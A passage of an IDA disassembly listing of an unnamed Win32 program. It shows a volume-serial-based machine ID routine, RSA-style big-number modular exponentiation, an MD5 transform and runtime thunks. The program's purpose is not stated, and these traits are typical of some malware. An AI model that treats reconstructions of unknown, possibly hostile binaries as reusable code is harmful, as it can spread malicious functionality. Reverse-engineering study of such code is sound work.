lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_40]
push [ebp+var_38]
call sub_43D2F7
add esp, 10h
loc_44406F: ; CODE XREF: sub_443EA2+1B0�j
; sub_443EA2+1B6�j
push [ebp+var_34]
call ds:dword_447618 ; LocalFree
push [ebp+var_38]
call ds:dword_447618 ; LocalFree
push 0
push [ebp+arg_4]
call sub_44118A
add esp, 8
loc_44408E: ; CODE XREF: sub_443EA2+152�j
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_444097: ; CODE XREF: sub_443EA2+118�j
mov eax, [ebp+var_1C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4440A0: ; CODE XREF: sub_443EA2+E6�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4440A9: ; CODE XREF: sub_443EA2+9C�j
mov eax, [ebp+var_8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4440B2: ; CODE XREF: sub_443EA2+6C�j
lea eax, [ebp+var_18]
push eax
call ds:dword_44ABA0
mov eax, dword_44B0C8
sub eax, 4
cmp ebx, eax
jz short $+2
loc_4440C8: ; CODE XREF: sub_443EA2+1B�j
pop edi
pop esi
pop ebx
leave
retn
sub_443EA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4440CD proc near ; DATA XREF: .data:off_44B234�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
push offset dword_44C8F0
push esi
call ds:dword_44A644
or eax, eax
jz short loc_4440F9
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_444141
; ---------------------------------------------------------------------------
loc_4440F9: ; CODE XREF: sub_4440CD+1A�j
push offset dword_44C870
push esi
call ds:dword_44A644
or eax, eax
jz short loc_444119
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_444141
; ---------------------------------------------------------------------------
loc_444119: ; CODE XREF: sub_4440CD+3A�j
push offset dword_44C840
push esi
call ds:dword_44A644
or eax, eax
jz short loc_444139
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_444141
; ---------------------------------------------------------------------------
loc_444139: ; CODE XREF: sub_4440CD+5A�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_444141: ; CODE XREF: sub_4440CD+2A�j
; sub_4440CD+4A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_4440CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_444148 proc near ; CODE XREF: sub_43B4DD+24�p
; sub_43B609+24�p ...
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_107 = byte ptr -107h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push edi
mov edi, [ebp+arg_0]
push 104h
lea eax, [ebp+var_108]
push eax
call ds:dword_4475FC ; GetSystemDirectoryA
movsx eax, word_44B11C
movsx edx, word_44B0F0
add edx, eax
sub edx, 7
mov [ebp+eax+var_107], dl
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
push eax
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_108]
push eax
call ds:dword_44A614 ; GetVolumeInformationA
push offset dword_44B6DC
call sub_43DF30
push [ebp+var_10C]
push eax
push edi
call ds:dword_44A634
add esp, 10h
mov eax, dword_44B0FC
sub eax, 3
mov [ebp+var_4], eax
jmp short loc_44420C
; ---------------------------------------------------------------------------
loc_4441DD: ; CODE XREF: sub_444148+D8�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 30h
jl short loc_4441F3
cmp al, 39h
jg short loc_4441F3
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 31h
loc_4441F3: ; CODE XREF: sub_444148+9D�j
; sub_444148+A1�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 41h
jl short loc_444209
cmp al, 5Ah
jg short loc_444209
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 20h
loc_444209: ; CODE XREF: sub_444148+B3�j
; sub_444148+B7�j
inc [ebp+var_4]
loc_44420C: ; CODE XREF: sub_444148+93�j
movsx eax, word_44B0CC
mov edx, dword_44B094
lea eax, [eax+edx+1]
cmp [ebp+var_4], eax
jb short loc_4441DD
pop edi
leave
retn
sub_444148 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_444228 proc near ; CODE XREF: sub_441DDE+13�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_4]
mov eax, 1
stosd
mov ecx, 0Fh
dec eax
rep stosd
lea edi, dword_44C950
mov esi, [ebp+arg_0]
mov ecx, 10h
rep movsd
mov edi, [ebp+arg_8]
call sub_4442F3
xor edx, edx
loc_444258: ; CODE XREF: sub_444228+52�j
push edx
push ebx
mov eax, [ebp+arg_8]
bt [eax], edx
jnb short loc_44426A
mov edx, [ebp+arg_4]
call sub_444284
loc_44426A: ; CODE XREF: sub_444228+38�j
lea edx, dword_44C950
call sub_444284
pop ebx
pop edx
inc edx
cmp edx, ebx
jbe short loc_444258
popa
pop ebp
retn 10h
sub_444228 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_444284 proc near ; CODE XREF: sub_444228+3D�p
; sub_444228+48�p
lea edi, dword_44C910
mov ecx, 10h
xor eax, eax
rep stosd
lea edi, dword_44C950
call sub_4442F3
loc_44429E: ; CODE XREF: sub_444284+5D�j
lea edi, dword_44C910
mov ecx, 10h
xor eax, eax
loc_4442AB: ; CODE XREF: sub_444284+2C�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_4442AB
call sub_444304
bt dword_44C950, ebx
jnb short loc_4442E0
mov esi, edx
lea edi, dword_44C910
xor eax, eax
mov ecx, 10h
loc_4442CF: ; CODE XREF: sub_444284+55�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_4442CF
call sub_444304
loc_4442E0: ; CODE XREF: sub_444284+3A�j
dec ebx
jns short loc_44429E
mov edi, edx
lea esi, dword_44C910
mov ecx, 10h
rep movsd
retn
sub_444284 endp
; =============== S U B R O U T I N E =======================================
sub_4442F3 proc near ; CODE XREF: sub_444228+29�p
; sub_444284+15�p
mov ebx, 1FFh
loc_4442F8: ; CODE XREF: sub_4442F3+B�j
bt [edi], ebx
jb short locret_444300
dec ebx
jnz short loc_4442F8
locret_444300: ; CODE XREF: sub_4442F3+8�j
retn
sub_4442F3 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_444304 proc near ; CODE XREF: sub_444284+2E�p
; sub_444284+57�p
lea esi, dword_44C910
mov edi, [ebp+14h]
mov ecx, 0Fh
loc_444312: ; CODE XREF: sub_444304+19�j
mov eax, [esi+ecx*4]
cmp eax, [edi+ecx*4]
jb short locret_44433B
ja short loc_44431F
dec ecx
jns short loc_444312
loc_44431F: ; CODE XREF: sub_444304+16�j
mov esi, [ebp+14h]
lea edi, dword_44C910
xor eax, eax
mov ecx, 10h
loc_44432F: ; CODE XREF: sub_444304+35�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_44432F
locret_44433B: ; CODE XREF: sub_444304+14�j
retn
sub_444304 endp
; =============== S U B R O U T I N E =======================================
sub_44433C proc near ; CODE XREF: sub_44438D+32�p
; sub_44438D+50�p ...
mov eax, ebx
and eax, ecx
push ebx
not ebx
and ebx, edx
or eax, ebx
pop ebx
retn
sub_44433C endp
; =============== S U B R O U T I N E =======================================
sub_444349 proc near ; CODE XREF: sub_44438D+219�p
; sub_44438D+238�p ...
mov eax, ebx
and eax, edx
push edx
not edx
and edx, ecx
or eax, edx
pop edx
retn
sub_444349 endp
; =============== S U B R O U T I N E =======================================
sub_444356 proc near ; CODE XREF: sub_44438D+420�p
; sub_44438D+43F�p ...
mov eax, ebx
xor eax, ecx
xor eax, edx
retn
sub_444356 endp
; =============== S U B R O U T I N E =======================================
sub_44435D proc near ; CODE XREF: sub_44438D+627�p
; sub_44438D+645�p ...
mov eax, edx
not eax
or eax, ebx
xor eax, ecx
retn
sub_44435D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_444366 proc near ; CODE XREF: sub_4407DD+76�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov dword ptr [edi], 67452301h
mov dword ptr [edi+4], 0EFCDAB89h
mov dword ptr [edi+8], 98BADCFEh
mov dword ptr [edi+0Ch], 10325476h
popa
pop ebp
retn 4
sub_444366 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44438D proc near ; CODE XREF: sub_4407DD+8E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov eax, [edi]
mov dword_44C990, eax
mov eax, [edi+4]
mov dword_44C994, eax
mov eax, [edi+8]
mov dword_44C998, eax
mov eax, [edi+0Ch]
mov dword_44C99C, eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44433C
add eax, [edi]
add eax, [esi]
add eax, 0D76AA478h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44433C
add eax, [edi+0Ch]
add eax, [esi+4]
add eax, 0E8C7B756h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44433C
add eax, [edi+8]
add eax, [esi+8]
add eax, 242070DBh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44433C
add eax, [edi+4]
add eax, [esi+0Ch]
add eax, 0C1BDCEEEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44433C
add eax, [edi]
add eax, [esi+10h]
add eax, 0F57C0FAFh
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44433C
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A8304613h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44433C
add eax, [edi+4]
add eax, [esi+1Ch]
add eax, 0FD469501h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44433C
add eax, [edi]
add eax, [esi+20h]
add eax, 698098D8h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44433C
add eax, [edi+0Ch]
add eax, [esi+24h]
add eax, 8B44F7AFh
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44433C
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFFF5BB1h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44433C
add eax, [edi+4]
add eax, [esi+2Ch]
add eax, 895CD7BEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44433C
add eax, [edi]
add eax, [esi+30h]
add eax, 6B901122h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44433C
add eax, [edi+0Ch]
add eax, [esi+34h]
add eax, 0FD987193h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44433C
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0A679438Eh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44433C
add eax, [edi+4]
add eax, [esi+3Ch]
add eax, 49B40821h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444349
add eax, [edi]
add eax, [esi+4]
add eax, 0F61E2562h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444349
add eax, [edi+0Ch]
add eax, [esi+18h]
add eax, 0C040B340h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444349
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 265E5A51h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444349
add eax, [edi+4]
add eax, [esi]
add eax, 0E9B6C7AAh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444349
add eax, [edi]
add eax, [esi+14h]
add eax, 0D62F105Dh
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444349
add eax, [edi+0Ch]
add eax, [esi+28h]
add eax, 2441453h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444349
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 0D8A1E681h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444349
add eax, [edi+4]
add eax, [esi+10h]
add eax, 0E7D3FBC8h
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444349
add eax, [edi]
add eax, [esi+24h]
add eax, 21E1CDE6h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444349
add eax, [edi+0Ch]
add eax, [esi+38h]
add eax, 0C33707D6h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444349
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0F4D50D87h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444349
add eax, [edi+4]
add eax, [esi+20h]
add eax, 455A14EDh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444349
add eax, [edi]
add eax, [esi+34h]
add eax, 0A9E3E905h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444349
add eax, [edi+0Ch]
add eax, [esi+8]
add eax, 0FCEFA3F8h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444349
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 676F02D9h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444349
add eax, [edi+4]
add eax, [esi+30h]
add eax, 8D2A4C8Ah
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444356
add eax, [edi]
add eax, [esi+14h]
add eax, 0FFFA3942h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444356
add eax, [edi+0Ch]
add eax, [esi+20h]
add eax, 8771F681h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444356
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 6D9D6122h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444356
add eax, [edi+4]
add eax, [esi+38h]
add eax, 0FDE5380Ch
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444356
add eax, [edi]
add eax, [esi+4]
add eax, 0A4BEEA44h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444356
add eax, [edi+0Ch]
add eax, [esi+10h]
add eax, 4BDECFA9h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444356
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 0F6BB4B60h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444356
add eax, [edi+4]
add eax, [esi+28h]
add eax, 0BEBFBC70h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444356
add eax, [edi]
add eax, [esi+34h]
add eax, 289B7EC6h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444356
add eax, [edi+0Ch]
add eax, [esi]
add eax, 0EAA127FAh
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444356
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0D4EF3085h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444356
add eax, [edi+4]
add eax, [esi+18h]
add eax, 4881D05h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444356
add eax, [edi]
add eax, [esi+24h]
add eax, 0D9D4D039h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444356
add eax, [edi+0Ch]
add eax, [esi+30h]
add eax, 0E6DB99E5h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444356
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 1FA27CF8h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444356
add eax, [edi+4]
add eax, [esi+8]
add eax, 0C4AC5665h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44435D
add eax, [edi]
add eax, [esi]
add eax, 0F4292244h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44435D
add eax, [edi+0Ch]
add eax, [esi+1Ch]
add eax, 432AFF97h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44435D
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0AB9423A7h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44435D
add eax, [edi+4]
add eax, [esi+14h]
add eax, 0FC93A039h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44435D
add eax, [edi]
add eax, [esi+30h]
add eax, 655B59C3h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44435D
add eax, [edi+0Ch]
add eax, [esi+0Ch]
add eax, 8F0CCC92h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44435D
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFEFF47Dh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44435D
add eax, [edi+4]
add eax, [esi+4]
add eax, 85845DD1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44435D
add eax, [edi]
add eax, [esi+20h]
add eax, 6FA87E4Fh
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44435D
add eax, [edi+0Ch]
add eax, [esi+3Ch]
add eax, 0FE2CE6E0h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44435D
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A3014314h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44435D
add eax, [edi+4]
add eax, [esi+34h]
add eax, 4E0811A1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44435D
add eax, [edi]
add eax, [esi+10h]
add eax, 0F7537E82h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44435D
add eax, [edi+0Ch]
add eax, [esi+2Ch]
add eax, 0BD3AF235h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44435D
add eax, [edi+8]
add eax, [esi+8]
add eax, 2AD7D2BBh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44435D
add eax, [edi+4]
add eax, [esi+24h]
add eax, 0EB86D391h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov eax, dword_44C990
add [edi], eax
mov eax, dword_44C994
add [edi+4], eax
mov eax, dword_44C998
add [edi+8], eax
mov eax, dword_44C99C
add [edi+0Ch], eax
popa
pop ebp
xor eax, eax
retn 8
sub_44438D endp
; =============== S U B R O U T I N E =======================================
sub_444BD8 proc near ; CODE XREF: sub_444BF5+1E�p
var_FFC = dword ptr -0FFCh
pop ecx
loc_444BD9: ; CODE XREF: sub_444BD8+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_444BD9
sub esp, eax
test [esp+0FFCh+var_FFC], eax
push ecx
retn
sub_444BD8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_444BF5 proc near ; CODE XREF: sub_4402F1+43�p
arg_0 = dword ptr 4
pop ecx
pop eax
add eax, 3
shr eax, 2
shl eax, 2
cmp eax, 1000h
jl short loc_444C25
mov edx, esp
push eax
fild [esp-4+arg_0]
mov [esp-4+arg_0], ecx
fild [esp-4+arg_0]
call sub_444BD8
mov esp, edx
push edx
fistp dword ptr [esp+0]
mov ecx, [esp+0]
fistp dword ptr [esp+0]
pop eax
loc_444C25: ; CODE XREF: sub_444BF5+10�j
sub esp, eax
mov eax, esp
mov dword ptr [eax], 0
push ecx
push ecx
retn
sub_444BF5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_444C34 proc near ; CODE XREF: .text:0043A1BA�p
; DATA XREF: .data:off_44B000�o
xor eax, eax
inc eax
retn 0Ch
sub_444C34 endp
; ---------------------------------------------------------------------------
align 4
push eax
fnstcw word ptr [esp]
mov eax, [esp]
btr dword ptr [esp], 8
or word ptr [esp], 200h
; START OF FUNCTION CHUNK FOR sub_444C5F
loc_444C4E: ; CODE XREF: sub_444C5F+D�j
fldcw word ptr [esp+4+var_4]
pop ecx
loc_444C52: ; CODE XREF: .text:00444C5D�j
mov al, ah
and eax, 3
retn
; END OF FUNCTION CHUNK FOR sub_444C5F
; ---------------------------------------------------------------------------
push eax
fnstcw word ptr [esp]
pop eax
jmp short loc_444C52
; =============== S U B R O U T I N E =======================================
sub_444C5F proc near ; CODE XREF: .text:loc_43A1A7�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00444C4E SIZE 0000000A BYTES
push eax
fnstcw word ptr [esp+4+var_4]
mov eax, [esp+4+var_4]
or word ptr [esp+4+var_4], 300h
jmp short loc_444C4E
sub_444C5F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_444C70 proc near ; CODE XREF: sub_43A503+8�p
; sub_43BAE4+8�p ...
var_FFC = dword ptr -0FFCh
pop ecx
loc_444C71: ; CODE XREF: sub_444C70+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_444C71
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_444C70 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_444C90 proc near ; CODE XREF: sub_43A503+258�p
; sub_43A503+5DC�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_444C90 endp
; ---------------------------------------------------------------------------
align 4
jmp ds:dword_44D0AC
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444CC8 proc near ; CODE XREF: sub_43A25C+10�p
jmp ds:dword_44D0B0
sub_444CC8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444CD4 proc near ; CODE XREF: sub_43A080+13�p
jmp ds:dword_44D0B4
sub_444CD4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444CE0 proc near ; CODE XREF: sub_43A1C3+33�p
; sub_43A1C3+45�p ...
jmp ds:dword_44D0C0
sub_444CE0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444CEC proc near ; CODE XREF: sub_43A1C3+B�p
; sub_43A1C3+17�p ...
jmp ds:dword_44D0C4
sub_444CEC endp
; ---------------------------------------------------------------------------
align 8
jmp ds:dword_44D0C8
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; ---------------------------------------------------------------------------
jmp ds:dword_44D0CC
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444D10 proc near ; CODE XREF: sub_43A25C+4E�p
; sub_43A25C+87�p
jmp ds:dword_44D0D0
sub_444D10 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444D1C proc near ; CODE XREF: .text:0043A186�p
jmp ds:dword_44D0D4
sub_444D1C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444D28 proc near ; CODE XREF: sub_43A1C3+71�p
; sub_43A1C3+86�p
jmp ds:dword_44D0D8
sub_444D28 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444D34 proc near ; CODE XREF: sub_43A25C+9E�p
